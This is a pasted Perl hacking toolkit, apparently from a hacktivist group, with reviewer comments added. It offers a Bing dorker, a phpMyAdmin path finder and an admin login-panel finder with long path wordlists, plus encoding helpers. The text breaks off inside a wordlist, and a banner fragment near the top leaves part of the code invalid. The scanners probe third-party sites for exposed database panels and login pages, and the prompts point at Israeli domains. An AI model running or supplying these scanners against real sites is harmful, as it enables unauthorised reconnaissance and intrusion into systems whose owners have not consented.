MultiTools r1z <= 1.0.1 beta

From CrashBandicot, 3 Years ago, written in Perl, viewed 1'057 times.
URL http://paste.security-portal.cz/view/8bc0e827 Embed
  1. #!/usr/bin/perl
  2. # Dev by CrashBandicot From TeaM MosTa
  3. # Gr33tz to CoupDeGrace - Saber-Dz  - Ma3str0-Dz - Boualem - xMjhad - Mouadh - k2ll3d - tn_Scorpion - Tn_pirate
  4. use HTTP::Request;
  5. use LWP::UserAgent;
  6. use Digest::MD5;
  7. use MIME::Base64;
  8. use LWP::Simple;
  9. use IO::Socket;
  10. use HTTP::Request::Common;
  11. use Term::ANSIColor;
  12. use Win32::Console::ANSI;
  # Console setup and main menu. `cls`, `title` and the Win32::Console::ANSI
  # import above are Windows-specific, so the script as written expects a
  # Windows console.
  13. system('cls');
  14. system('title Scanner v1.0 by TeaM MosTa');
  15. print color("green"),"======================================================\n";
  16. print color("green"),"  MultiTools r1z <= 1.0.1 beta   \n";
  17. print color("green"),"    [#] TeaM MosTa [#]      \n";
  18. print color("red"), "   Coded by CrashBandicot                  \n";
  19. print color("green"), "======================================================\n";
  20. print color("green"),"[1] Joomla Scanner\n";
  21. print color("green"),"[2] Md5 Encoder\n";
  22. print color("green"), "[3] PhpMyAdmin finder\n";
  23. print color("green"), "[4] Admin Panel finder\n";
  24. print color("green"), "[5] Base64 Encoder\n";
  25. print color("green"), "[6] Base64 Decoder\n";
  26. print color("green"), "[7] PhpNuke Sql Scanner\n";
  27. print color("green"), "[8] Dorker Bing\n";
  28. print color("green"), "[9] About Us\n\n";
  29. print "[+] Choose Number : ";
  # The choice is read with the diamond operator: it reads from files named
  # in @ARGV when any are given, and from STDIN otherwise. The value is
  # compared as a string by the `if($targett eq ...)` branches that follow.
  30. my $targett = <>;
  31. chomp $targett;
  # Menu option 8: page through Bing web-search results for a query typed by
  # the operator and append every extracted result link to done.txt.
  # All HTTP requests in this branch go to www.bing.com; the sites that end up
  # in done.txt are not contacted here.
  32. if($targett eq '8')
  33. {
  34.  system('cls');
  35.  system('color a');
  36.  
  # NOTE(review): listing lines 37-43 look like the body and closing `};` of a
  # quoted banner string whose opening statement is missing from the paste.
  # As shown they are not valid Perl - confirm against the raw file.
  37. +----------------------[Dorker bing]--------------------+
  38. |                                                       |
  39. |                     Edited By TeaM MosTa              |
  40. |                   result in done.txt                  |
  41. +-------------------------------------------------------+
  42.  
  43. };
  44. print "\nDork:";
  45. print "\n(Ex: index.php+site:.il )\n";
  46. print "=>";
  # The query is taken verbatim from STDIN and concatenated into the search
  # URL below without URL-encoding.
  47.  $dork = <STDIN>;
  48.  chomp($dork);
  49.  
  50.  print "Scan Start!";
  51.  
  # At most 100 result pages: the `first` offset runs 0, 10, ... 990.
  52.  for ($i = 0; $i < 1000; $i += 10) {
  53.  
  # A new user agent is created for every page. It sends a fixed browser-style
  # User-Agent string, uses a 30 second timeout, and env_proxy makes it take
  # proxy settings from the *_proxy environment variables.
  54.  $b = LWP::UserAgent->new(agent => 'Mozilla/4.8 [en] (Windows NT 6.0; U)');
  55.  $b->timeout(30);
  56.  $b->env_proxy;
  # The response is not checked for success; whatever body comes back
  # (including an error page) is scanned below.
  57.  $c = $b->get('http://www.bing.com/search?q=' . $dork . '&first=' . $i . '&FORM=PERE')->content;
  # -1 when the marker 'sb_pagN' is absent from the page (presumably the
  # next-page control); tested after the inner loop to stop paging.
  58.  $check = index($c, 'sb_pagN');
  59.  
  # Inner loop: repeatedly find the next `<h3><a href="` and cut out the
  # attribute value that follows it.
  60.  while (1) {
  61.  $n = index($c, '<h3><a href="');
  62.  
  63.  if ($n == -1) {
  64.  last;
  65.  }
  66.  
  # $s is printed before it is reassigned, so the console shows the link from
  # the previous extraction, one step behind what is written to done.txt.
  67.  print "$s\n";
  # 13 is the length of the marker string; $c is advanced past it and $s is
  # the text up to the next double quote.
  68.  $c = substr($c, $n + 13);
  69.  $s = substr($c, 0, index($c, '"'));
  # Two-argument open on a bareword handle, in append mode, with no error
  # check: if done.txt cannot be opened the link is silently dropped.
  70.  open (txt,">>done.txt");
  71.  print txt  $s,"\n";
  72.  close(txt);
  73.  
  74.  }
  75.  if ($check == -1) {
  76.  last;
  77.  }
  78.  }
  79.  print "Scan Finished!";
  # Passes the file name to the shell as a command; presumably relies on the
  # Windows file association to open done.txt - TODO confirm.
  80.  system("done.txt");
  81.  exit;
  82.  
  83. }
  84. if($targett eq '9')
  85. {
  86.  
  87.         system('cls');
  88.         system('title About Us');
  89.         print "
  90. \t
  91.  
  92. \t :::==== :::===== :::====  :::=======
  93. \t :::==== :::      :::  === ::: === ===
  94. \t  ===   ======   ======== === === ===
  95. \t  ===   ===      ===  === ===     ===
  96. \t  ===   ======== ===  === ===     ===
  97.                                      
  98. \t:::=======  :::====  :::===  :::==== :::====
  99. \t::: === === :::  === :::     :::==== :::  ===
  100. \t=== === === ===  ===  =====    ===   ========
  101. \t===     === ===  ===     ===   ===   ===  ===
  102. \t===     ===  ======  ======    ===   ===  ===
  103.      
  104.  
  105.      \n";
  # Tail of the "About Us" screen (menu option 9): credits, then an optional
  # prompt to open the group's web site.
  106.       print "\tT00ls Dev by CrashBandicot\n";
  107.       print "\tFrom TeaM MosTa\n";
  108.       print "\tSpecial Greetz To All Member of Gantengers-Crews\n";
  109.       print "\t[*] Do you want open Gantengers-Crews (y/n) => ";
  110.       my $openit = <>;
  111.       chomp($openit);
  # Only an exact lowercase "y" triggers the branch; any other input prints
  # the footer line instead.
  112.       if($openit eq "y")
  113.       {
  # `start` is a Windows shell built-in; the URL is a fixed literal, so no
  # user input reaches the shell here.
  114.         system('start http://gantengers-crews.org/');
  115.       }
  116.       else
  117.       {
  118.         print "\t<----TeaM-Mosta---->";
  119.       }
  120.  
  121. }
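  # Menu option 2: read one line from STDIN and print its MD5 digest as
  # 32 lowercase hex characters.
  if ($targett eq '2')
  {
      system('cls');
      system('title Md5 Encoder');
      {
          print " Md5 Encoder !!!!! \n";
          print " Enter Your String:";
          $md = <STDIN>;
          # STDIN at end-of-file yields undef; hash the empty string rather
          # than warn on chomp/md5_hex of an undefined value.
          $md = '' unless defined $md;
          chomp $md;
          # md5_hex is a plain function, not a method. The original
          # `Digest::MD5->md5_hex("$md")` passed the class name as the first
          # data argument, so the digest printed was that of the string
          # "Digest::MD5" followed by the input, not of the input itself.
          print Digest::MD5::md5_hex($md);
      }
  }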
  134. if($targett eq '3')
  135. { #Script Coded By CrashBandicot (me :)
  136.         system('cls');
  137.         system('title PhpMyAdmin FInder');
  138. @pathh=('/phpMyAdmin/',
  139. '/phpmyadmin/',
  140. '/PMA/',
  141. '/pma/',
  142. '/admin/',
  143. '/dbadmin/',
  144. '/mysql/',
  145. '/myadmin/',
  146. '/phpmyadmin2/',
  147. '/phpMyAdmin2/',
  148. '/phpMyAdmin-2/',
  149. '/php-my-admin/',
  150. '/phpMyAdmin-2.2.3/',
  151. '/phpMyAdmin-2.2.6/',
  152. '/phpMyAdmin-2.5.1/',
  153. '/phpMyAdmin-2.5.4/',
  154. '/phpMyAdmin-2.5.5-rc1/',
  155. '/phpMyAdmin-2.5.5-rc2/',
  156. '/phpMyAdmin-2.5.5/',
  157. '/phpMyAdmin-2.5.5-pl1/',
  158. '/phpMyAdmin-2.5.6-rc1/',
  159. '/phpMyAdmin-2.5.6-rc2/',
  160. '/phpMyAdmin-2.5.6/',
  161. '/phpMyAdmin-2.5.7/',
  162. '/phpMyAdmin-2.5.7-pl1/',
  163. '/phpMyAdmin-2.6.0-alpha/',
  164. '/phpMyAdmin-2.6.0-alpha2/',
  165. '/phpMyAdmin-2.6.0-beta1/',
  166. '/phpMyAdmin-2.6.0-beta2/',
  167. '/phpMyAdmin-2.6.0-rc1/',
  168. '/phpMyAdmin-2.6.0-rc2/',
  169. '/phpMyAdmin-2.6.0-rc3/',
  170. '/phpMyAdmin-2.6.0/',
  171. '/phpMyAdmin-2.6.0-pl1/',
  172. '/phpMyAdmin-2.6.0-pl2/',
  173. '/phpMyAdmin-2.6.0-pl3/',
  174. '/phpMyAdmin-2.6.1-rc1/',
  175. '/phpMyAdmin-2.6.1-rc2/',
  176. '/phpMyAdmin-2.6.1/',
  177. '/phpMyAdmin-2.6.1-pl1/',
  178. '/phpMyAdmin-2.6.1-pl2/',
  179. '/phpMyAdmin-2.6.1-pl3/',
  180. '/phpMyAdmin-2.6.2-rc1/',
  181. '/phpMyAdmin-2.6.2-beta1/',
  182. '/phpMyAdmin-2.6.2-rc1/',
  183. '/phpMyAdmin-2.6.2/',
  184. '/phpMyAdmin-2.6.2-pl1/',
  185. '/phpMyAdmin-2.6.3/',
  186. '/phpMyAdmin-2.6.3-rc1/',
  187. '/phpMyAdmin-2.6.3/',
  188. '/phpMyAdmin-2.6.3-pl1/',
  189. '/phpMyAdmin-2.6.4-rc1/',
  190. '/phpMyAdmin-2.6.4-pl1/',
  191. '/phpMyAdmin-2.6.4-pl2/',
  192. '/phpMyAdmin-2.6.4-pl3/',
  193. '/phpMyAdmin-2.6.4-pl4/',
  194. '/phpMyAdmin-2.6.4/',
  195. '/phpMyAdmin-2.7.0-beta1/',
  196. '/phpMyAdmin-2.7.0-rc1/',
  197. '/phpMyAdmin-2.7.0-pl1/',
  198. '/phpMyAdmin-2.7.0-pl2/',
  199. '/phpMyAdmin-2.7.0/',
  200. '/phpMyAdmin-2.8.0-beta1/',
  201. '/phpMyAdmin-2.8.0-rc1/',
  202. '/phpMyAdmin-2.8.0-rc2/',
  203. '/phpMyAdmin-2.8.0/',
  204. '/phpMyAdmin-2.8.0.1/',
  205. '/phpMyAdmin-2.8.0.2/',
  206. '/phpMyAdmin-2.8.0.3/',
  207. '/phpMyAdmin-2.8.0.4/',
  208. '/phpMyAdmin-2.8.1-rc1/',
  209. '/phpMyAdmin-2.8.1/',
  210. '/phpMyAdmin-2.8.2/',
  211. '/sqlmanager/',
  212. '/mysqlmanager/',
  213. '/p/m/a/',
  214. '/PMA2005/',
  215. '/pma2005/',
  216. '/phpmanager/',
  217. '/php-myadmin/',
  218. '/phpmy-admin/',
  219. '/webadmin/',
  220. '/sqlweb/',
  221. '/websql/',
  222. '/webdb/',
  223. '/mysqladmin/',
  224. '/mysql-admin/',
  225. '/mya/',
  226. );
  # phpMyAdmin path probe (menu option 3): one HTTP GET per entry of @pathh,
  # each appended to the operator-supplied target, with the verdict printed
  # and appended to PhpMyadmin.txt.
  # Seen from the web server, this is a run of requests from one client for
  # phpMyAdmin directory-name variants in list order, sent through
  # LWP::Simple's `get` with its default User-Agent.
  227. print "PhpMyAdmin Finder !! :p \n";
  228. print "result in PhpMyadmin.txt \n";
  229. print "Enter Target:";
  # The target is used exactly as typed; nothing here adds a scheme or
  # validates the value.
  230. my $trget = <>;
  231. chomp $trget;
  232. foreach $pathh(@pathh){
  233. my $URLll = $trget.$pathh;
  # LWP::Simple::get returns undef when the request fails.
  234. my $Source = get $URLll;
  # This guard tests $URLll, which is always defined at this point, so it
  # never fires; a failed fetch leaves $Source undefined and falls through.
  235. die "Can not get $URLll" unless defined $URLll;
  # Only the first pattern is bound to $Source. `=~` binds tighter than `||`,
  # so the other three patterns are matched against $_ instead. A "found"
  # line in the output file is therefore not evidence that a panel exists.
  236. if ($Source =~ /phpMyAdmin/ || /Welcome to phpMyAdmin/ || /Username/ || /Password/) { $Messageee ="PhpMyAdmin P4n3l F!nded";}
  237. else { $Messageee = "P4n3l Not F0und ";}
  238. print "$URLll     =>    $Messageee\n";
  # Printed inside the loop, i.e. once per probed path.
  239. print "\n \n \n \n \t \t \t \t FINISH ";
  # Append-mode open on a bareword handle with no error check.
  240. open (TEXT, '>>PhpMyadmin.txt');
  241. print TEXT "\n$URLll   =>   $Messageee \n\n";
  242. close (TEXT);
  243. }
  244.  
  245. }
  246. if($targett eq '4')
  247. { #Script Original Coded By Tartou2
  # Admin-panel probe (menu option 4), input stage: ask for the target and for
  # the server-side language, which selects the path list used further down.
  248. system('cls');
  249. system('title Admin Panel Finder');
  250.         print " Enter Target \n";
  251. print" e.g.: www.target.co.il or www.target.co.il/path\n";
  252. print" --> ";
  253. $site=<STDIN>;
  254. chomp $site;
  255.  
  256. print "\n\n";
  257. print " Enter the coding language of the website \n";
  258. print" e.g.: asp, php, cfm, other\n";
  259. print" If you don't know the launguage used in the coding then simply type ** other ** \n";
  260. print"--> ";
  # $code is compared with eq against "asp", "cfm", "php" and "other" below;
  # any other value matches none of those branches.
  261. $code=<STDIN>;
  262. chomp($code);
  263.  
  # "http://" is prepended unless the input already starts with "http:".
  # No other validation of the target is done.
  264. if ( $site !~ /^http:/ ) {
  265. $site = 'http://' . $site;
  266. }
  # Ensure a trailing slash so the relative paths can be appended directly.
  267. if ( $site !~ /\/$/ ) {
  268. $site = $site . '/';
  269. }
  270. print "\n";
  271.  
  272. print "->The website: $site\n";
  273. print "->Source of the website: $code\n";
  274. print "->Scan of the admin control panel is progressing...\n\n\n";
  275.  
  276. if($code eq "asp"){
  277.  
  278. @path1=('_admin/','backoffice/','admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
  279. 'memberadmin/','administratorlogin/','adm/','account.asp','admin/account.asp','admin/index.asp','admin/login.asp','admin/admin.asp',
  280. 'admin_area/admin.asp','admin_area/login.asp','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
  281. 'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.asp','bb-admin/index.asp','bb-admin/login.asp','bb-admin/admin.asp',
  282. 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.html','admin.html','admin/cp.html','cp.html',
  283. 'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html',
  284. 'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.html','panel-administracion/login.html',
  285. 'admin/home.asp','admin/controlpanel.asp','admin.asp','pages/admin/admin-login.asp','admin/admin-login.asp','admin-login.asp','admin/cp.asp','cp.asp',
  286. 'administrator/account.asp','administrator.asp','login.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','administrator/login.asp',
  287. 'moderator/admin.asp','controlpanel.asp','admin/account.html','adminpanel.html','webadmin.html','pages/admin/admin-login.html','admin/admin-login.html',
  288. 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.asp','user.html','admincp/index.asp','admincp/login.asp','admincp/index.html',
  289. 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html',
  290. 'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admin/admin_login.html',
  291. 'admincontrol/login.html','adm/index.html','adm.html','admincontrol.asp','admin/account.asp','adminpanel.asp','webadmin.asp','webadmin/index.asp',
  292. 'webadmin/admin.asp','webadmin/login.asp','admin/admin_login.asp','admin_login.asp','panel-administracion/login.asp','adminLogin.asp',
  293. 'admin/adminLogin.asp','home.asp','admin.asp','adminarea/index.asp','adminarea/admin.asp','adminarea/login.asp','admin-login.html',
  294. 'panel-administracion/index.asp','panel-administracion/admin.asp','modelsearch/index.asp','modelsearch/admin.asp','administrator/index.asp',
  295. 'admincontrol/login.asp','adm/admloginuser.asp','admloginuser.asp','admin2.asp','admin2/login.asp','admin2/index.asp','adm/index.asp',
  296. 'adm.asp','affiliate.asp','adm_auth.asp','memberadmin.asp','administratorlogin.asp','siteadmin/login.asp','siteadmin/index.asp','siteadmin/login.html'
  297. );
  298.  
  # Probe loop for the "asp" list: one GET per entry of @path1 appended to
  # $site, classified only by keywords in the response body.
  # Server-side footprint: sequential requests from a single client for
  # admin/login path names in list order. LWP::UserAgent->new() is called
  # without an agent string, so the library's default "libwww-perl/<version>"
  # User-Agent is sent.
  299. foreach $ways(@path1){
  300.  
  301. $final=$site.$ways;
  302.  
  # A fresh request and user agent are built for every path; 30 s timeout.
  303. my $req=HTTP::Request->new(GET=>$final);
  304. my $ua=LWP::UserAgent->new();
  305. $ua->timeout(30);
  306. my $response=$ua->request($req);
  307.  
  # The HTTP status is never consulted. Any body containing one of these
  # substrings counts as a hit, including error pages, so "Found" lines from
  # this tool are weak evidence of a real login page.
  308. if($response->content =~ /Username/ ||
  309. $response->content =~ /Password/ ||
  310. $response->content =~ /username/ ||
  311. $response->content =~ /password/ ||
  312. $response->content =~ /USERNAME/ ||
  313. $response->content =~ /PASSWORD/ ||
  314. $response->content =~ /Senha/ ||
  315. $response->content =~ /senha/ ||
  316. $response->content =~ /Personal/ ||
  317. $response->content =~ /Usuario/ ||
  318. $response->content =~ /Clave/ ||
  319. $response->content =~ /Usager/ ||
  320. $response->content =~ /usager/ ||
  321. $response->content =~ /Sing/ ||
  322. $response->content =~ /passe/ ||
  323. $response->content =~ /P\/W/ ||
  324. $response->content =~ /Admin Password/
  325. ){
  326. print " \n [+] Found -> $final\n\n";
  327. print " \n The Login Page Finded \n\n Good Job \n\n";
  328. }else{
  329. print "[-] Not Found <- $final\n";
  330. }
  331. }
  332. }
  333.  
  334.  
  335.  
  336.  
  337.  
  338. # -------------------test cfm ---------------------------|
  339.  
  340.  
  341.  
  342.  
  343.  
  344.  
  345. if($code eq "cfm"){
  346.  
  347. @path1=('_admin/','backoffice/','admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
  348. 'memberadmin/','administratorlogin/','adm/','account.cfm','admin/account.cfm','admin/index.cfm','admin/login.cfm','admin/admin.cfm',
  349. 'admin_area/admin.cfm','admin_area/login.cfm','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
  350. 'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.cfm','bb-admin/index.cfm','bb-admin/login.cfm','bb-admin/admin.cfm',
  351. 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.html','admin.html','admin/cp.html','cp.html',
  352. 'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html',
  353. 'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.html','panel-administracion/login.html',
  354. 'admin/home.cfm','admin/controlpanel.cfm','admin.cfm','pages/admin/admin-login.cfm','admin/admin-login.cfm','admin-login.cfm','admin/cp.cfm','cp.cfm',
  355. 'administrator/account.cfm','administrator.cfm','login.cfm','modelsearch/login.cfm','moderator.cfm','moderator/login.cfm','administrator/login.cfm',
  356. 'moderator/admin.cfm','controlpanel.cfm','admin/account.html','adminpanel.html','webadmin.html','pages/admin/admin-login.html','admin/admin-login.html',
  357. 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.cfm','user.html','admincp/index.cfm','admincp/login.cfm','admincp/index.html',
  358. 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html',
  359. 'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admin/admin_login.html',
  360. 'admincontrol/login.html','adm/index.html','adm.html','admincontrol.cfm','admin/account.cfm','adminpanel.cfm','webadmin.cfm','webadmin/index.cfm',
  361. 'webadmin/admin.cfm','webadmin/login.cfm','admin/admin_login.cfm','admin_login.cfm','panel-administracion/login.cfm','adminLogin.cfm',
  362. 'admin/adminLogin.cfm','home.cfm','admin.cfm','adminarea/index.cfm','adminarea/admin.cfm','adminarea/login.cfm','admin-login.html',
  363. 'panel-administracion/index.cfm','panel-administracion/admin.cfm','modelsearch/index.cfm','modelsearch/admin.cfm','administrator/index.cfm',
  364. 'admincontrol/login.cfm','adm/admloginuser.cfm','admloginuser.cfm','admin2.cfm','admin2/login.cfm','admin2/index.cfm','adm/index.cfm',
  365. 'adm.cfm','affiliate.cfm','adm_auth.cfm','memberadmin.cfm','administratorlogin.cfm','siteadmin/login.cfm','siteadmin/index.cfm','siteadmin/login.html'
  366. );
  367.  
  # Probe loop for the "cfm" list: the same request-and-keyword logic as the
  # other language branches, run over the ColdFusion-flavoured @path1.
  # In access logs this is a burst of GETs for admin/login path names from
  # one client, carrying LWP's default "libwww-perl/<version>" User-Agent
  # because no agent string is set.
  368. foreach $ways(@path1){
  369.  
  370. $final=$site.$ways;
  371.  
  # New request and user agent per path, 30 s timeout.
  372. my $req=HTTP::Request->new(GET=>$final);
  373. my $ua=LWP::UserAgent->new();
  374. $ua->timeout(30);
  375. my $response=$ua->request($req);
  376.  
  # Classification looks only at the body text and never at the status code,
  # so any page containing one of these words is reported as a login page.
  377. if($response->content =~ /Username/ ||
  378. $response->content =~ /Password/ ||
  379. $response->content =~ /username/ ||
  380. $response->content =~ /password/ ||
  381. $response->content =~ /USERNAME/ ||
  382. $response->content =~ /PASSWORD/ ||
  383. $response->content =~ /Senha/ ||
  384. $response->content =~ /senha/ ||
  385. $response->content =~ /Personal/ ||
  386. $response->content =~ /Usuario/ ||
  387. $response->content =~ /Clave/ ||
  388. $response->content =~ /Usager/ ||
  389. $response->content =~ /usager/ ||
  390. $response->content =~ /Sing/ ||
  391. $response->content =~ /passe/ ||
  392. $response->content =~ /P\/W/ ||
  393. $response->content =~ /Admin Password/
  394. ){
  395. print " \n [+] Found -> $final\n\n";
  396. print " \n The login Page Found \n\n Good Job \n\n";
  397. }else{
  398. print "[-] Not Found <- $final\n";
  399. }
  400. }
  401. }
  402.  
  403.  
  404.  
  405.  
  406.  
  407.  
  408. #--------------------------/test php-------------------------|
  409.  
  410.  
  411.  
  412. if($code eq "php"){
  413.  
  414. @path2=('_admin/','backoffice/','admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
  415. 'memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/admin.php','admin/account.php',
  416. 'admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
  417. 'admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html',
  418. 'admin/controlpanel.php','admin.php','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
  419. 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
  420. 'admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php',
  421. 'administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php',
  422. 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.php','modelsearch/login.php','moderator.php','moderator/login.php',
  423. 'moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php',
  424. 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','adminarea/index.html','adminarea/admin.html',
  425. 'webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.html',
  426. 'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
  427. 'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
  428. 'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpanel.html','admincontrol.html',
  429. 'panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','admin.php','adminarea/index.php',
  430. 'adminarea/admin.php','adminarea/login.php','panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php',
  431. 'modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php',
  432. 'adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php'
  433. );
  434.  
  # Probe loop for the "php" list (@path2): one GET per candidate path under
  # $site, with a hit decided by body keywords alone.
  # Detection notes: requests arrive in the fixed order of @path2 from a
  # single client and, with no agent string configured, carry LWP's default
  # "libwww-perl/<version>" User-Agent; most will be 404s on a site that does
  # not have these paths.
  435. foreach $ways(@path2){
  436.  
  437. $final=$site.$ways;
  438.  
  # Request object and user agent are rebuilt on every iteration; 30 s timeout.
  439. my $req=HTTP::Request->new(GET=>$final);
  440. my $ua=LWP::UserAgent->new();
  441. $ua->timeout(30);
  442. my $response=$ua->request($req);
  443.  
  # The response status is ignored: a not-found or error page whose text
  # happens to contain one of these substrings is still reported as "Found".
  444. if($response->content =~ /Username/ ||
  445. $response->content =~ /Password/ ||
  446. $response->content =~ /username/ ||
  447. $response->content =~ /password/ ||
  448. $response->content =~ /USERNAME/ ||
  449. $response->content =~ /PASSWORD/ ||
  450. $response->content =~ /Senha/ ||
  451. $response->content =~ /senha/ ||
  452. $response->content =~ /Personal/ ||
  453. $response->content =~ /Usuario/ ||
  454. $response->content =~ /Clave/ ||
  455. $response->content =~ /Usager/ ||
  456. $response->content =~ /usager/ ||
  457. $response->content =~ /Sing/ ||
  458. $response->content =~ /passe/ ||
  459. $response->content =~ /P\/W/ ||
  460. $response->content =~ /Admin Password/
  461. ){
  462. print " \n [+] Found -> $final\n\n";
  463. print " \n  Login Page Finded \n\n Good :) \n\n";
  464. }else{
  465. print "[-] Not Found <- $final\n";
  466. }
  467. }
  468. }
  469.  
  470.  
  471.  
  472.  
  473.  
  474. # ----------------------- other ---------------------------|
  475.  
  476.  
  477.  
  478.  
  479.  
  480.  
  481. if($code eq "other"){
  482.  
  483. @path1=('_admin/','backoffice/','account.asp','account.cfm','account.html','account.php','acct_login/','adm.asp','adm.cfm','adm.html','adm.php','adm/','adm/admloginuser.asp','adm/admloginuser.cfm','adm/admloginuser.php','adm/index.asp','adm/index.cfm','adm/index.html','adm/index.php','adm_auth.asp','adm_auth.cfm','adm_auth.php','admin.asp','admin.cfm','admin.html','admin.php','admin/','admin/account.asp','admin/account.cfm','admin/account.html','admin/account.php','admin/admin.asp','admin/admin.cfm','admin/admin.html','admin/admin.php','admin/admin_login.asp','admin/admin_login.cfm','admin/admin_login.html','admin/admin_login.php','admin/adminLogin.asp','admin/admin-login.asp','admin/adminLogin.cfm','admin/admin-login.cfm','admin/adminLogin.html','admin/admin-login.html','admin/adminLogin.php','admin/admin-login.php','admin/controlpanel.asp','admin/controlpanel.cfm','admin/controlpanel.html','admin/controlpanel.php','admin/cp.asp','admin/cp.cfm','admin/cp.html','admin/cp.php','admin/home.asp','admin/home.cfm','admin/home.html','admin/home.php','admin/index.asp','admin/index.cfm','admin/index.html','admin/index.php','admin/login.asp','admin/login.cfm','admin/login.html','admin/login.php','admin_area/','admin_area/admin.asp','admin_area/admin.cfm','admin_area/admin.html','admin_area/admin.php','admin_area/index.asp','admin_area/index.cfm','admin_area/index.html','admin_area/index.php','admin_area/login.asp','admin_area/login.cfm','admin_area/login.html','admin_area/login.php','admin_login.asp','admin_login.cfm','admin_login.html','admin_login.php','admin1.asp','admin1.html','admin1.php','admin1/','admin2.asp','admin2.cfm','admin2.html','admin2.php','admin2/index.asp','admin2/index.cfm','admin2/index.php','admin2/login.asp','admin2/login.cfm','admin2/login.php','admin4_account/','admin4_colon/','adminarea/','adminarea/admin.asp','adminarea/admin.cfm','adminarea/admin.html','adminarea/admin.php','adminarea/index.asp','adminarea/index.cfm','adminarea/index.html','
adminarea/index.php','adminarea/login.asp','adminarea/login.cfm','adminarea/login.html','adminarea/login.php','admincontrol.asp','admincontrol.cfm','admincontrol.html','admincontrol.php','admincontrol/login.asp','admincontrol/login.cfm','admincontrol/login.html','admincontrol/login.php','admincp/index.asp','admincp/index.cfm','admincp/index.html','admincp/login.asp','admincp/login.cfm','administer/','administr8.asp','administr8.html','administr8.php','administr8/','administratie/','administration.html','administration.php','administration/','administrator.asp','administrator.cfm','administrator.html','administrator.php','administrator/','administrator/account.asp','administrator/account.cfm','administrator/account.html','administrator/account.php','administrator/index.asp','administrator/index.cfm','administrator/index.html','administrator/index.php','administrator/login.asp','administrator/login.cfm','administrator/login.html','administrator/login.php','administratoraccounts/','administratorlogin.asp','administratorlogin.cfm','administratorlogin.php','administratorlogin/','administrators/','administrivia/','adminLogin.asp','admin-login.asp','adminLogin.cfm','admin-login.cfm','adminLogin.html','admin-login.html','adminLogin.php','admin-login.php','adminLogin/','adminpanel.asp','adminpanel.cfm','adminpanel.html','adminpanel.php','adminpro/','admins.asp','admins.html','admins.php','admins/','AdminTools/','admloginuser.asp','admloginuser.cfm','admloginuser.php','affiliate.asp','affiliate.cfm','affiliate.php','autologin/','banneradmin/','bbadmin/','bb-admin/','bb-admin/admin.asp','bb-admin/admin.cfm','bb-admin/admin.html','bb-admin/admin.php','bb-admin/index.asp','bb-admin/index.cfm','bb-admin/index.html','bb-admin/index.php','bb-admin/login.asp','bb-admin/login.cfm','bb-admin/login.html','bb-admin/login.php','bigadmin/','blogindex/','cadmins/','ccp14admin/','cmsadmin/','controlpanel.asp','controlpanel.cfm','controlpanel.html','controlpanel.php','controlpanel/','cp.asp'
